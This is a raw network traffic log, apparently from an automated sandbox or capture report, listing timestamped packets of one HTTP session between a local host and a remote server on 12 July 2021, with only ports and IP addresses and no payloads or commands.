Jul 12, 2021 10:28:46.157872915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.157905102 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.157927990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.157948971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.157972097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.157985926 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.157999992 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.158818007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.158855915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.158878088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.158920050 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.158945084 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.158958912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.158984900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.159044027 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.159946918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.159981012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.160027981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.160089016 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.160350084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.160459042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.160475016 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.160499096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.160522938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.160542965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.160552025 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.160598993 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.161345959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.161379099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.161446095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.161461115 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.161484957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.161505938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.161531925 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.162466049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.162497997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.162538052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.162560940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.162575006 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.162597895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.162625074 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.162647963 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.163301945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.163429022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.163475990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.163490057 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.163542032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.163566113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.163592100 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.164279938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.164371014 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.164400101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.164422035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.164484024 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.164896965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.164940119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.164990902 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.165023088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.165045977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.165069103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.165095091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.165765047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.165827036 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.165896893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.165961981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.165991068 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.166013002 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.166048050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.166098118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.166954041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.166985035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.167010069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.167032957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.167056084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.167087078 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.167140961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.167745113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.167817116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.167855024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.167920113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.167953014 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.167973995 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.167995930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.168046951 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.168740034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.168777943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.168804884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.168842077 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.169258118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.169339895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.169388056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.169481039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.169506073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.170079947 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.170285940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.170310974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.170331955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.170388937 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.170447111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.170480013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.170511961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.171174049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.171228886 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.171408892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.171436071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.171482086 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.171544075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.171614885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.171663046 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.172225952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.172260046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.172282934 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.172303915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.172324896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.173018932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.173120022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.173147917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.173171997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.173187971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.173239946 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.173727989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.173921108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.173949003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.173974991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.173998117 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.174012899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.174072027 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.174705982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.174767971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.174928904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.174974918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.174997091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.175023079 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.175044060 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.175079107 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.175646067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.175678015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.175699949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.175721884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.175770044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.175786972 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.175826073 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.176559925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.176623106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.176662922 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.176696062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.176784039 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.176819086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.176846027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.176923990 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.177711964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.177745104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.177766085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.177834034 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.178121090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.178144932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.178165913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.178181887 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.178215981 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.178237915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.178320885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.178378105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.179105043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.179153919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.179235935 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.179263115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.179289103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.179312944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.179347038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.180087090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.180126905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.180170059 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.180187941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.180213928 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.180238008 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.180250883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.180310965 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.181226969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.181258917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.181279898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.181308031 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.181360006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.181374073 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.182066917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.182102919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.182127953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.182142973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.182190895 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.182612896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.182646990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.182710886 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.182832956 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.182877064 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.182899952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.182928085 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.183631897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.183661938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.183725119 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.183765888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.183820963 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.183883905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.183923960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.183973074 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.184489012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.184640884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.184686899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.184701920 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.184725046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.184772968 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.184847116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.185538054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.185569048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.185590982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.185606003 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.185628891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.185641050 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.185662031 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.185720921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.186472893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.186506987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.186528921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.186549902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.186563015 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.186605930 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.187258959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.187333107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.187355995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.187380075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.187393904 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.187417984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.187452078 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.188194990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.188225985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.188249111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.188262939 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.188286066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.188306093 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.188323021 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.188374043 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.189239025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.189270020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.189292908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.189312935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.189332962 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.189364910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.189376116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.190057993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.190089941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.190112114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.190134048 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.190192938 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.190222025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.190264940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.190315008 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.190918922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.190949917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.190973043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.191009045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.191023111 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.191087961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.191725016 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.191756010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.191778898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.191808939 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.191859961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.191899061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.191914082 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.192728043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.192807913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.192857027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.192881107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.192902088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.192923069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.192933083 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.192976952 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.193593979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.193649054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.193717957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.193727970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.193754911 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.193779945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.193810940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.194571972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.194607973 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.194638014 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.194648027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.194694996 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.194710016 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.194777012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.194827080 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.195527077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.195697069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.195769072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.195787907 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.195811987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.195863962 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.196223974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.196257114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.196314096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.196332932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.196355104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.196377039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.196409941 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.197215080 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.197244883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.197282076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.197304964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.197344065 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.197380066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.197400093 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.197447062 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.198179960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.198218107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.198276043 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.198295116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.198321104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.198348045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.198370934 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.199306011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.199342012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.199364901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.199384928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.199404001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.199420929 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.199441910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.199506998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.199994087 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.200018883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.200045109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.200068951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.200083971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.200119019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.200783014 CEST	80	49720	47.254.186.176	192.168.2.3
